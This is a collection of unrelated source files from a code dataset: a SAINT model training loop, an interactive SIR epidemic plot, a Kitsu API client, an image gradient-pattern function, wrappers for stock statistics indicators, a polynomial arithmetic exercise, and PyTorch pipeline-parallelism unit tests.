y_dim = 1
else:
y_dim = len(np.unique(y_train['data'][:,0]))
cat_dims = np.append(np.array([1]),np.array(cat_dims)).astype(int) #Appending 1 for CLS token, this is later used to generate embeddings.
# note in this implementation, we are passing a bunch of hyperparams directly to the model class
model = SAINT(
categories = tuple(cat_dims), # remember there's a leading 1 here.. array([ 1, 12, 3, 4, 2, 2, 2, 3, 12, 4])
num_continuous = len(con_idxs), # continuous indices: [0, 5, 9, 11, 12, 13, 14]
dim = opt.embedding_size, # via config: 32
dim_out = 1, # I think just a single output?
depth = opt.transformer_depth, # in our case, overridden to 1
heads = opt.attention_heads, # in our case, 4
attn_dropout = opt.attention_dropout, # in our case, overridden to 0.8
ff_dropout = opt.ff_dropout, # in our case, overridden to 0.8
mlp_hidden_mults = (4, 2), # I think these are feedforward hidden layers
cont_embeddings = opt.cont_embeddings, # i forget what this does
attentiontype = opt.attentiontype, # colrow aka vanilla SAINT
final_mlp_style = opt.final_mlp_style, # it's 'sep' but honestly i don't know what this does
y_dim = y_dim #dimensinoality of objective, in this case 2
)
vision_dset = opt.vision_dset
if y_dim == 2 and opt.task == 'binary':
# opt.task = 'binary'
criterion = nn.CrossEntropyLoss().to(device)
elif y_dim > 2 and opt.task == 'multiclass':
# opt.task = 'multiclass'
criterion = nn.CrossEntropyLoss().to(device)
elif opt.task == 'regression':
criterion = nn.MSELoss().to(device)
else:
raise'case not written yet'
model.to(device)
if opt.pretrain:
from pretraining import SAINT_pretrain
model = SAINT_pretrain(model, cat_idxs,X_train,y_train, continuous_mean_std, opt,device)
## Choosing the optimizer
if opt.optimizer == 'SGD':
optimizer = optim.SGD(model.parameters(), lr=opt.lr,
momentum=0.9, weight_decay=5e-4)
from utils import get_scheduler
scheduler = get_scheduler(opt, optimizer)
elif opt.optimizer == 'Adam':
optimizer = optim.Adam(model.parameters(),lr=opt.lr)
elif opt.optimizer == 'AdamW':
optimizer = optim.AdamW(model.parameters(),lr=opt.lr)
best_valid_auroc = 0
best_valid_accuracy = 0
best_test_auroc = 0
best_test_accuracy = 0
best_valid_rmse = 100000
print('Training begins now.')
for epoch in range(opt.epochs):
model.train()
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
optimizer.zero_grad()
# x_categ is the the categorical data, x_cont has continuous data, y_gts has ground truth ys. cat_mask is an array of ones same shape as x_categ and an additional column(corresponding to CLS token) set to 0s. con_mask is an array of ones same shape as x_cont.
x_categ, x_cont, y_gts, cat_mask, con_mask = data[0].to(device), data[1].to(device),data[2].to(device),data[3].to(device),data[4].to(device)
# We are converting the data to embeddings in the next step
_ , x_categ_enc, x_cont_enc = embed_data_mask(x_categ, x_cont, cat_mask, con_mask,model,vision_dset)
reps = model.transformer(x_categ_enc, x_cont_enc)
# select only the representations corresponding to CLS token and apply mlp on it in the next step to get the predictions.
y_reps = reps[:,0,:]
y_outs = model.mlpfory(y_reps)
if opt.task == 'regression':
loss = criterion(y_outs,y_gts)
else:
loss = criterion(y_outs,y_gts.squeeze())
loss.backward()
optimizer.step()
if opt.optimizer == 'SGD':
scheduler.step()
running_loss += loss.item()
# print(running_loss)
if opt.active_log:
wandb.log({'epoch': epoch ,'train_epoch_loss': running_loss,
'loss': loss.item()
})
if epoch%5==0:
model.eval()
with torch.no_grad():
if opt.task in ['binary','multiclass']:
accuracy, auroc = classification_scores(model, validloader, device, opt.task,vision_dset)
test_accuracy, test_auroc = classification_scores(model, testloader, device, opt.task,vision_dset)
print('[EPOCH %d] VALID ACCURACY: %.3f, VALID AUROC: %.3f' %
(epoch + 1, accuracy,auroc ))
print('[EPOCH %d] TEST ACCURACY: %.3f, TEST AUROC: %.3f' %
(epoch + 1, test_accuracy,test_auroc ))
if opt.active_log:
wandb.log({'valid_accuracy': accuracy ,'valid_auroc': auroc })
wandb.log({'test_accuracy': test_accuracy ,'test_auroc': test_auroc })
if opt.task =='multiclass':
if accuracy > best_valid_accuracy:
best_valid_accuracy = accuracy
best_test_auroc = test_auroc
best_test_accuracy = test_accuracy
torch.save(model.state_dict(),'%s/bestmodel.pth' % (modelsave_path))
else:
if accuracy > best_valid_accuracy:
best_valid_accuracy = accuracy
# if auroc > best_valid_auroc:
# best_valid_auroc = auroc
best_test_auroc = test_auroc
best_test_accuracy = test_accuracy
torch.save(model.state_dict(),'%s/bestmodel.pth' % (modelsave_path))
else:
valid_rmse = mean_sq_error(model, validloader, device,vision_dset)
test_rmse = mean_sq_error(model, testloader, device,vision_dset)
print('[EPOCH %d] VALID RMSE: %.3f' %
(epoch + 1, valid_rmse ))
print('[EPOCH %d] TEST RMSE: %.3f' %
(epoch + 1, test_rmse ))
if opt.active_log:
wandb.log({'valid_rmse': valid_rmse ,'test_rmse': test_rmse })
if valid_rmse < best_valid_rmse:
best_valid_rmse = valid_rmse
best_test_rmse = test_rmse
torch.save(model.state_dict(),'%s/bestmodel.pth' % (modelsave_path))
model.train()
total_parameters = count_parameters(model)
print('TOTAL NUMBER OF PARAMS: %d' %(total_parameters))
if opt.task =='binary':
print('AUROC on best model: %.3f' %(best_test_auroc))
elif opt.task =='multiclass':
print('Accuracy on best model: %.3f' %(best_test_accuracy))
else:
print('RMSE on best model: %.3f' %(best_test_rmse))
if opt.active_log:
if opt.task == 'regression':
wandb.log({'total_parameters': total_parameters, 'test_rmse_bestep':best_test_rmse ,
'cat_dims':len(cat_idxs) , 'con_dims':len(con_idxs) })
else:
wandb.log({'total_parameters': total_parameters, 'test_auroc_bestep':best_test_auroc ,
'test_accuracy_bestep':best_test_accuracy,'cat_dims':len(cat_idxs) , 'con_dims':len(con_idxs) })
|
StarcoderdataPython
|
1732255
|
### SCIPY Y MATPLOTLIB
import numpy as np
#from scipy.special import jn
# ejemplo con funcion Bessel (foto de Rosalind Franklin)
#x = np.linspace(xmin, xmax, npts)
#layers = np.array([jn(i, x)**2 for i in range(nlayers)])
#maxi = [(np.diff(np.sign(np.diff(layers[i,:]))) < 0).nonzero()[0] + 1
# for i in range(nlayers)]
### EJEMPLO DEL MODELO EPIDEMIOLOGICO DE SIR
#from scipy.integrate import odeint
#import matplotlib.pyplot as plt
#SI: Enfermedades víricas que causan infección vitalicia, como el VIH.
#SIS: Enfermedades que no confieren inmunidad tras la infección
#SIR: Enfermedades víricas en las que una vez infectado, se obtiene inmunidad vitalicia
#def deriv(y, t, N, beta, gamma):
#S, I, R = y
#dSdt = -beta * S * I / N
#dIdt = beta * S * I / N - gamma * I
#dRdt = gamma * I
#return dSdt, dIdt, dRdt
# Initial conditions vector
#y0 = S0, I0, R0
# Integrate the SIR equations over the time grid, t.
#ret = odeint(deriv, y0, t, args=(N, beta, gamma))
#S, I, R = ret.T
### Grafica interactiva
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, RadioButtons # Interactivo
def dySIS(y, t, lamda, mu): # SI/SIS model
dy_dt = lamda*y*(1-y)-mu*y
return dy_dt
def dySIR(y, t, lamda, mu): # SIR model,
i, s = y
di_dt = lamda*s*i-mu*i
ds_dt = -lamda*s*i
return np.array([di_dt,ds_dt])
# valores de parametros
number = 1e5 # total number of people
lamda = 0.2 # Daily contact rate, the average number of susceptible persons who are effectively in contact with the sick each day
sigma = 2.5 # Number of contacts during infectious period
mu = lamda/sigma # Daily cure rate, the ratio of the number of patients cured each day to the total number of patients
tEnd = 200 # Forecast date length
t = np.arange(0.0,tEnd,1) # (start,stop,step)
i0 = 1e-4 # Initial value of the proportion of patients
s0 = 1-i0 # Initial value of the proportion of susceptible persons
Y0 = (i0, s0) # Initial value of the differential equation system
ySI = odeint(dySIS, i0, t, args=(lamda,0)) # SI model
ySIS = odeint(dySIS, i0, t, args=(lamda,mu)) # SIS model
ySIR = odeint(dySIR, Y0, t, args=(lamda,mu)) # SIR model
#Graficar
fig, ax = plt.subplots()
plt.subplots_adjust(left=0.25, bottom=0.4)
plt.title("Comparison among SI, SIS and SIR models")
plt.xlabel('time')
plt.axis([0, tEnd, -0.1, 1.1])
si_plt, = plt.plot(t, ySI,':g', label='i(t)-SI')
sis_plt, = plt.plot(t, ySIS,'--g', label='i(t)-SIS')
sir_i_plt, = plt.plot(t, ySIR[:,0],'-r', label='i(t)-SIR')
sir_s_plt, = plt.plot(t, ySIR[:,1],'-b', label='s(t)-SIR')
sir_r_plt, = plt.plot(t, 1-ySIR[:,0]-ySIR[:,1],'-m', label='r(t)-SIR')
plt.legend(loc='best') # buscar la mejor localizacion
#Agregar barras interactivas
axcolor = 'lightgoldenrodyellow'
# Generamos el área de las barras
axlambda = plt.axes([0.25, 0.1, 0.65, 0.03], facecolor=axcolor)
axsigma = plt.axes([0.25, 0.18, 0.65, 0.03], facecolor=axcolor)
axi0 = plt.axes([0.25, 0.26, 0.65, 0.03], facecolor=axcolor)
# Agregamos la información
slambda = Slider(axlambda, 'Daily contact rate', 0.1, 1,
valinit=lamda, color="green")
ssigma = Slider(axsigma, 'Contacts during\ninfectious period', 0.1, 10,
valinit=sigma)
si0 = Slider(axi0, 'Initial proportion\nof patients', 1e-4, 5e-1,
valinit=i0, color="orange")
plt.show()
### actualizacion
def update(val, ):
lamda = slambda.val
sigma = ssigma.val
i0 = si0.val
mu = lamda / sigma
s0 = 1 - i0
Y0 = (i0, s0)
ySI = odeint(dySIS, i0, t, args=(lamda, 0)) # SI model
ySIS = odeint(dySIS, i0, t, args=(lamda, mu)) # SIS model
ySIR = odeint(dySIR, Y0, t, args=(lamda, mu)) # SIR model
si_plt.set_ydata(ySI)
sis_plt.set_ydata(ySIS)
sir_i_plt.set_ydata(ySIR[:, 0])
sir_s_plt.set_ydata(ySIR[:, 1])
sir_r_plt.set_ydata(1 - ySIR[:, 0] - ySIR[:, 1])
fig.canvas.draw_idle()
plt.show()
### se aplica la funcion
slambda.on_changed(update)
ssigma.on_changed(update)
si0.on_changed(update)
### botones para ver un solo tipo de modelo
rax = plt.axes([0.025, 0.5, 0.15, 0.15], facecolor=axcolor)
radio = RadioButtons(rax, ('SI', 'SIS', 'SIR'), active=0)
lines = {'SI':[si_plt], 'SIS':[sis_plt],
'SIR':[sir_i_plt, sir_s_plt, sir_r_plt]}
def select_model(label):
# la linea seleccionada no es transparente
for line_m in lines[label]:
line_m.set_alpha(1)
# las demas lineas seran transparentes
for others in set(lines.keys()) - set([label]):
for line_m in lines[others]:
line_m.set_alpha(0)
fig.canvas.draw_idle()
# donde de click, va a mostrar
radio.on_clicked(select_model)
plt.show()
|
StarcoderdataPython
|
3222331
|
from .anime import *
from .user import *
from .library import *
from .manga import *
from .drama import *
from .auth import *
from .mappings import *
class Kitsu:
"""
:ivar KitsuAnime anime: Instance interface for the Kitsu Anime endpoints
:ivar KitsuUser user: Instance interface for the Kitsu User endpoints
:ivar KitsuLib library: Instance interface for the Kitsu Library endpoints.
:ivar KitsuManga manga: Instance interface for the Kitsu Manga endpoints.
:ivar KitsuDrama drama: Instance interface for the Kitsu Drama endpoints.
:ivar KitsuAuth auth: Instance interface for the Kitsu Auth endpoints / storage engine.
"""
def __init__(self, cid, csecret):
"""
Initialize a new Kitsu API instance.
"""
api = "https://kitsu.io/api/edge"
header = {
'User-Agent': 'Pymoe (git.vertinext.com/ccubed/Pymoe)',
'Accept': 'application/vnd.api+json',
'Content-Type': 'application/vnd.api+json'
}
self.anime = KitsuAnime(api, header)
self.manga = KitsuManga(api, header)
self.drama = KitsuDrama(api, header)
self.library = KitsuLib(api, header)
self.mappings = KitsuMappings(api, header)
self.user = KitsuUser(api, header)
self.auth = KitsuAuth(header, cid, csecret)
|
StarcoderdataPython
|
4823453
|
import numpy as np
from scipy.signal import convolve
def gbp(img):
g1 = np.array([[-1,0,1]])
g2 = np.array([[-1],[0],[1]])
g3 = np.array([[0,0,1],[0,0,0],[-1,0,0]])
g4 = np.array([[-1,0,0],[0,0,0],[0,0,1]])
rg1 = convolve(img, g1, mode="same")
rg2 = convolve(img, g2, mode="same")
rg3 = convolve(img, g3, mode="same")
rg4 = convolve(img, g4, mode="same")
s1 = (np.abs(rg1) - np.abs(rg4)) >= 0
s2 = (np.abs(rg3) - np.abs(rg4)) >= 0
s3 = (np.abs(rg1) - np.abs(rg2)) >= 0
s7 = (np.abs(rg1)) >= 0
s6 = (np.abs(rg2)) >= 0
s5 = (np.abs(rg3)) >= 0
s4 = (np.abs(rg4)) >= 0
gbp_im = s1*(2**0) + s2*(2**1) + s3*(2**2) + s4*(2**3) + s5*(2**4) + s6*(2**5) + s7*(2**6)
return gbp_im
|
StarcoderdataPython
|
1646361
|
<filename>qufilab/indicators/stat.py
"""
@ Qufilab, 2020.
@ <NAME>
Python interface for statistics indicators.
"""
import numpy as np
from qufilab.indicators._stat import *
def std(data, periods, normalize = True):
"""
.. Standard Deviation
Parameters
----------
data : `ndarray`
An array containing values.
periods : `int`
Number of periods to be used.
normalize : `bool`, optional
Specify whether to normalize the standard deviation with
n - 1 instead of n.
Defaults to True.
Returns
-------
`ndarray`
An array containing standard deviation values for the specified periods.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load a sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> print(df['close'].dtype)
float64
>>> sma = ql.std(df['close'], periods = 10)
>>> print(sma)
[nan nan nan ... 3.31897842 2.9632574 3.02394683]
"""
return std_calc(data, periods, normalize)
def var(data, periods, normalize = True):
"""
.. Variance
Parameters
----------
data : `ndarray`
An array containing values.
periods : `int`
Number of periods to be used.
normalize : `bool`, optional
Specify whether to normalize the standard deviation with
n - 1 instead of n.
Defaults to `True`.
Returns
-------
`ndarray`
An array containing variance values.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load a sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> print(df['close'].dtype)
float64
>>> var = ql.var(df['close'], periods = 10)
>>> print(var)
[nan nan nan ... 11.01561778 8.78089444 9.14425444]
"""
return var_calc(data, periods, normalize)
def cov(data, market, periods, normalize = True):
"""
.. Covariance
Parameters
----------
data : `ndarray`
An array containing values.
market : `ndarray`
An array containing market values to be used as the comparison
when calculating beta.
periods : `int`
Number of periods to be used.
normalize : `bool`, optional
Specify whether to normalize covariance with
n - 1 instead of n.
Defaults to `True`.
Returns
-------
`ndarray`
An array containing covariance values.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> df_market = ql.load_sample('DJI')
>>> cov = ql.cov(df['close'], df_market['close'], periods = 10)
>>> print(cov)
[nan nan nan ... -360.37842558 -99.1077715 60.84627274]
"""
return cov_calc(data, market, periods, normalize)
def beta(data, market, periods, normalize = False):
"""
.. Beta
Parameters
----------
data : `ndarray`
An array containing values.
market : `ndarray`
An array containing market values to be used as the comparison
when calculating beta.
periods : `int`
Number of periods to be used.
normalize : `bool`, optional
Specify whether to normalize the standard deviation calculation
within the beta calculation with n - 1 instead of n.
Defaults to False.
Returns
-------
`ndarray`
An array containing beta values.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> df_market = ql.load_sample('DJI')
>>> beta = ql.beta(df['close'], df_market['close'], periods = 10)
>>> print(beta)
[nan nan nan ... 0.67027616 0.45641977 0.3169785]
"""
return beta_calc(data, market, periods, normalize)
def pct_change(data, periods):
"""
.. Percentage Change
Parameters
----------
data : `ndarray`
An array containing values.
periods : `int`
Number of periods to be used.
Returns
-------
`ndarray`
An array containing percentage change for the specified periods.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> pct_change = ql.pct_change(df['close'], periods = 10)
>>> print(pct_change)
[nan nan nan ... -1.52155537 -0.81811879 0.25414157]
"""
return pct_change_calc(data, periods)
|
StarcoderdataPython
|
99362
|
<filename>Codes/Data_Structures/Week_2/Polynomial.py
'''
# 一元多项式的乘法与加法运算
设计函数分别求两个一元多项式的乘积与和。
输入格式:
输入分2行,每行分别先给出多项式非零项的个数,再以指数递降方式输入一个多项式非零
项系数和指数(绝对值均为不超过1000的整数)。数字间以空格分隔。
输出格式:
输出分2行,分别以指数递降方式输出乘积多项式以及和多项式非零项的系数和指数。数字
间以空格分隔,但结尾不能有多余空格。零多项式应输出0 0。
输入样例:
4 3 4 -5 2 6 1 -2 0
3 5 20 -7 4 3 1
输出样例:
15 24 -25 22 30 21 -10 20 -21 8 35 6 -33 5 14 4 -15 3 18 2 -6 1
5 20 -4 4 -5 2 9 1 -2 0
'''
# 真的懒地用C实现了(emmmm主要是课件里已经实现了不想“照抄”) 本周前几道题做的心态有点崩 最后一个让我用Python写下缓会儿……
import re
class Polynomial():
def __init__(self, args = []):
self.args = {}
for i in range(len(args)//2):
self.args[int(args[2*i+1])] = int(args[2*i])
# print(self.args)
def add(self, poly):
p = Polynomial()
p.args = self.args
for k, v in poly.args.items():
if p.args.get(k):
p.args[k] += v
if p.args[k] == 0:
del p.args[k]
else:
p.args[k] = v
if not len(p.args):
p.args[0] = 0
return p
def multiplication(self, poly):
p = Polynomial()
for k2, v2 in poly.args.items():
for k1, v1 in self.args.items():
if p.args.get(k1+k2):
p.args[k1+k2] += v1 * v2
if p.args[k1+k2] == 0:
del p.args[k1+k2]
else:
p.args[k1+k2] = v1 * v2
if not len(p.args):
p.args[0] = 0
return p
def __str__(self):
argsList = []
args = sorted(self.args.items(), key = lambda item:item[0],reverse=True)
for k, v in args:
argsList.append(v)
argsList.append(k)
return ' '.join(list(map(str, argsList)))
def main():
poly1 = Polynomial(re.split(r" +",input())[1:])
poly2 = Polynomial(re.split(r" +",input())[1:])
print(poly1.multiplication(poly2))
print(poly1.add(poly2))
if __name__ == '__main__':
main()
'''
Tests
6 1 2 1 1
3 1 1 -1 0
'''
|
StarcoderdataPython
|
4824935
|
# Copyright 2019 <NAME>
#
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
from collections import OrderedDict
from copy import deepcopy
import time
import pytest
import random
import torch
from torch import nn
from torch import Tensor
from torch.distributed.pipeline.sync import Pipe, NoChunk, WithDevice
from torch.distributed.pipeline.sync.pipe import PipeSequential
skip_if_no_cuda = pytest.mark.skipif(not torch.cuda.is_available(), reason="cuda required")
def test_pipe_without_rpc():
model = nn.Sequential(nn.Linear(1, 1))
with pytest.raises(RuntimeError, match='Please initialize RPC framework'):
pipe = Pipe(model, chunks=1)
def test_parameters(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
pipe = Pipe(model, chunks=1)
assert list(pipe.parameters()) != []
def test_public_attrs(setup_rpc):
class MyString:
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
model = nn.Sequential(nn.Linear(1, 1))
pipe = Pipe(model, chunks=42.000, checkpoint=MyString("always"))
assert pipe.devices == [torch.device("cpu")]
assert pipe.chunks == 42
assert isinstance(pipe.chunks, int)
assert pipe.checkpoint == "always"
assert isinstance(pipe.checkpoint, str)
def test_sequential_like(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
model = nn.Sequential(a, b)
model = Pipe(model)
assert len(model) == 2
assert list(model) == [a, b]
assert model[0] is a
assert model[1] is b
with pytest.raises(IndexError):
_ = model[2]
assert model[-1] is b
assert model[-2] is a
def test_chunks_less_than_1(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
with pytest.raises(ValueError):
Pipe(model, chunks=0)
with pytest.raises(ValueError):
Pipe(model, chunks=-1)
def test_batch_size_indivisible(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model, chunks=4)
with pytest.warns(None) as record:
model(torch.rand(7, 1))
# Indivisible batch size is legal.
assert not record
def test_batch_size_small(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model, chunks=4)
with pytest.warns(None) as record:
model(torch.rand(2, 1))
# Batch size smaller than chunks is legal.
assert not record
def test_checkpoint_mode(setup_rpc):
def count_grad_fn(grad_fn, name, visited=None):
if visited is None:
visited = set()
if grad_fn in visited:
return 0
visited.add(grad_fn)
if grad_fn is None:
return 0
if grad_fn.__class__.__name__ == name:
return 1
counter = 0
for next_grad_fn, _ in grad_fn.next_functions:
counter += count_grad_fn(next_grad_fn, name, visited=visited)
return counter
model = nn.Sequential(nn.Linear(1, 1))
input = torch.rand(2, 1)
always = Pipe(model, chunks=2, checkpoint="always")
except_last = Pipe(model, chunks=2, checkpoint="except_last")
never = Pipe(model, chunks=2, checkpoint="never")
always_output = always(input)
except_last_output = except_last(input)
never_output = never(input)
assert count_grad_fn(always_output.local_value().grad_fn, "CheckpointBackward") == 2
assert count_grad_fn(except_last_output.local_value().grad_fn, "CheckpointBackward") == 1
assert count_grad_fn(never_output.local_value().grad_fn, "CheckpointBackward") == 0
def test_checkpoint_mode_invalid(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
with pytest.raises(ValueError, match="checkpoint is not one of 'always', 'except_last', or 'never'"):
Pipe(model, chunks=2, checkpoint="INVALID_CHECKPOINT")
def test_checkpoint_mode_when_chunks_1(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
# All checkpoint modes are fine.
Pipe(model, chunks=1, checkpoint="except_last")
Pipe(model, chunks=1, checkpoint="always")
Pipe(model, chunks=1, checkpoint="never")
def test_checkpoint_eval(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model, chunks=2)
input = torch.rand(2, 1)
def find_grad_fn(grad_fn, name):
if grad_fn is None:
return False
if grad_fn.__class__.__name__ == name:
return True
for next_grad_fn, _ in grad_fn.next_functions:
if find_grad_fn(next_grad_fn, name):
return True
return False
model.train()
train_output = model(input)
assert find_grad_fn(train_output.local_value().grad_fn, "CheckpointBackward")
assert find_grad_fn(train_output.local_value().grad_fn, "RecomputeBackward")
model.eval()
eval_output = model(input)
assert not find_grad_fn(eval_output.local_value().grad_fn, "CheckpointBackward")
assert not find_grad_fn(eval_output.local_value().grad_fn, "RecomputeBackward")
def test_checkpoint_non_float_input(setup_rpc):
class ForkNonFloat(nn.Module):
def forward(self, input):
return (input * 2, torch.tensor([False]))
class JoinNonFloat(nn.Module):
def forward(self, input, non_float):
return input * 2
model = nn.Sequential(ForkNonFloat(), JoinNonFloat())
model = Pipe(model, chunks=1, checkpoint="always")
input = torch.rand(1, requires_grad=True)
output = model(input)
output.backward()
def test_no_grad(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model, chunks=2)
input = torch.rand(2, 1)
latent = None
def hook(module, input, output):
_ = module
_ = input
nonlocal latent
latent = output
partition = model.partitions[0]
partition.register_forward_hook(hook)
with torch.no_grad():
model(input)
assert latent.grad_fn is None
def test_exception(setup_rpc):
class ExpectedException(Exception):
pass
class Raise(nn.Module):
def forward(self, *_):
raise ExpectedException()
model = nn.Sequential(Raise())
model = Pipe(model, chunks=1)
with pytest.raises(ExpectedException):
model(torch.rand(1))
def test_exception_early_stop_asap(setup_rpc):
"""Even the first partitions have finished to process, the partition before
the failed partition should be killed as soon as possible.
"""
class ExpectedException(Exception):
pass
class Pass(nn.Module):
def forward(self, x):
return x
counter = 0
class Counter(nn.Module):
def forward(self, x):
time.sleep(0.1)
nonlocal counter
counter += 1
return x
class Raise(nn.Module):
def forward(self, x):
raise ExpectedException()
model = nn.Sequential(Pass(), Pass(), Counter(), Raise())
model = Pipe(model, chunks=3)
with pytest.raises(ExpectedException):
model(torch.rand(3))
# If the early stop doesn't work, it would be 3 instead.
assert counter == 2
def test_nested_input(setup_rpc):
class NestedInput(nn.Module):
def __init__(self):
super().__init__()
self.fc_a = nn.Linear(1, 1)
self.fc_b = nn.Linear(1, 1)
def forward(self, inp):
return inp
model = nn.Sequential(NestedInput())
model = Pipe(model, chunks=2)
a = torch.rand(10, 1, requires_grad=True)
b = torch.rand(10, 1, requires_grad=True)
# TypeError: expected Tensor, but got tuple
with pytest.raises(TypeError):
model((a, (a, b))).local_value()
# TypeError: expected Tensor, but got list
with pytest.raises(TypeError):
model((a, [a, b])).local_value()
def test_input_pair(setup_rpc):
class Two(nn.Module):
def __init__(self):
super().__init__()
self.fc_a = nn.Linear(1, 1)
self.fc_b = nn.Linear(1, 1)
def forward(self, a, b):
return (self.fc_a(a), self.fc_b(b))
model = nn.Sequential(Two())
model = Pipe(model, chunks=2)
a = torch.rand(10, 1, requires_grad=True)
b = torch.rand(10, 1, requires_grad=True)
a_out, b_out = model(a, b).local_value()
loss = (a_out + b_out).mean()
loss.backward()
assert a.grad is not None
assert b.grad is not None
def test_multi_sequence_input(setup_rpc):
class MultiSeq(nn.Module):
def forward(self, tup1, tup2):
return tup1, tup2
model = Pipe(nn.Sequential(MultiSeq()))
with pytest.raises(TypeError):
model(
[torch.rand(10), torch.rand(10)],
[torch.rand(10), torch.rand(10)]
)
def test_input_singleton(setup_rpc):
class One(nn.Module):
def __init__(self):
super().__init__()
self.fc = nn.Linear(1, 1)
def forward(self, a):
return (self.fc(a),)
model = nn.Sequential(One())
model = Pipe(model, chunks=2)
a = torch.rand(10, 1, requires_grad=True)
(a_out,) = model(a).local_value()
loss = a_out.mean()
loss.backward()
assert all(p.grad is not None for p in model.parameters())
assert a.grad is not None
def test_input_varargs(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model)
a = torch.rand(1)
b = torch.rand(1)
# TypeError: forward() takes 2 positional arguments but 3 were given
with pytest.raises(TypeError):
model(a, b)
def test_non_tensor(setup_rpc):
class NonTensor(nn.Module):
def forward(self, _):
return "hello"
model = nn.Sequential(NonTensor())
model = Pipe(model)
x = torch.rand(1)
with pytest.raises(TypeError):
model(x)
with pytest.raises(TypeError):
model("hello")
def test_non_tensor_sequence(setup_rpc):
class NonTensorTuple(nn.Module):
def forward(self, x):
return (x, "hello")
class NonTensorArgs(nn.Module):
def forward(self, x: str, y: bool):
return x, y
model = nn.Sequential(NonTensorTuple())
model = Pipe(model)
x = torch.rand(1)
with pytest.raises(TypeError):
model((x, "hello"))
with pytest.raises(TypeError):
model([x, "hello"])
model = nn.Sequential(NonTensorArgs())
model = Pipe(model)
with pytest.raises(TypeError):
# Need atleast one Tensor.
model("hello", True)
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_valid_non_tensor(checkpoint, setup_rpc):
class NonTensor1(nn.Module):
def forward(self, a: int, b: Tensor, c: bool, d: Tensor):
res = b + a if c else b * a
if d is not None:
res += d
return res, c, a, b, "hello", d
class NonTensor2(nn.Module):
def forward(self, a: Tensor, b: bool, c: int, d: Tensor, e: str, f: Tensor):
res = a * c if b else a + c
res += d
return c, res, a, d + f if f is not None else d, b, e, f
model = Pipe(nn.Sequential(NonTensor1(), NonTensor2()), chunks=5, checkpoint=checkpoint)
a = random.randint(0, 10)
b = torch.rand(10, 10)
c = random.randint(0, 1) == 0
d = torch.rand(10, 10)
res = model(a, b, c, d).local_value()
assert 7 == len(res)
assert [a] * 5 == res[0]
if c:
assert torch.allclose(((b + a + d) * a) + b, res[1])
assert torch.allclose(b + a + d, res[2])
else:
assert torch.allclose(((b * a) + d + a) + b, res[1])
assert torch.allclose(b * a + d, res[2])
assert torch.allclose(b + d, res[3])
assert [c] * 5 == res[4]
assert ["hello"] * 5 == res[5]
assert torch.allclose(d, res[6])
# Test one of the tensors can be None
res = model(a, b, c, None).local_value()
assert 7 == len(res)
assert [a] * 5 == res[0]
if c:
assert torch.allclose(((b + a) * a) + b, res[1])
assert torch.allclose(b + a, res[2])
else:
assert torch.allclose(((b * a) + a) + b, res[1])
assert torch.allclose(b * a, res[2])
assert torch.allclose(b, res[3])
assert [c] * 5 == res[4]
assert ["hello"] * 5 == res[5]
assert [None] * 5 == res[6]
# Need atleast one tensor.
with pytest.raises(TypeError):
model(a, None, c, None)
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_no_tensor_output(checkpoint, setup_rpc):
class Model1(nn.Module):
def forward(self, a: int, b: Tensor, c: bool):
return a, c, "hello"
class Model2(nn.Module):
def forward(self, a: int, b: bool, c: str):
return a, c, b
model = Pipe(nn.Sequential(Model1(), Model2()), chunks=5)
a = random.randint(0, 10)
b = torch.rand(10, 10)
c = random.randint(0, 1) == 0
# Need atleast one tensor across partitions too.
with pytest.raises(TypeError):
res = model(a, b, c).local_value()
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_uneven_batch_size(checkpoint, setup_rpc):
class Model(nn.Module):
def forward(self, a: Tensor, b: int, c: Tensor):
return a, b, c
model = Pipe(nn.Sequential(Model()), checkpoint=checkpoint, chunks=5)
a = torch.rand(3, 10)
b = random.randint(0, 10)
c = torch.rand(6, 10)
res = model(a, b, c).local_value()
assert torch.allclose(a, res[0])
assert [b] * 3 == res[1] # 3 chunks
assert torch.allclose(c, res[2])
# Two tensors producing uneven chunks would fail.
model = Pipe(nn.Sequential(Model()), checkpoint=checkpoint, chunks=5)
a = torch.rand(3, 10)
b = random.randint(0, 10)
c = torch.rand(4, 10)
with pytest.raises(RuntimeError, match='Found different number of chunks'):
model(a, b, c)
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_no_chunk(checkpoint, setup_rpc):
class Model(nn.Module):
def forward(self, a: Tensor, b: int, c: Tensor):
return a, b, c
model = Pipe(nn.Sequential(Model()), checkpoint=checkpoint, chunks=5)
a = torch.rand(10, 10)
b = random.randint(0, 10)
c = torch.rand(10, 10)
res = model(a, b, NoChunk(c)).local_value()
assert torch.allclose(a, res[0])
assert [b] * 5 == res[1]
# c gets replicated due to NoChunk and the same tensor gets concatenated 5
# times in the output.
assert torch.allclose(torch.cat((c, c, c, c, c)), res[2])
# Test invalid type for NoChunk
with pytest.raises(TypeError, match='NoChunk only supported for tensors'):
NoChunk(b)
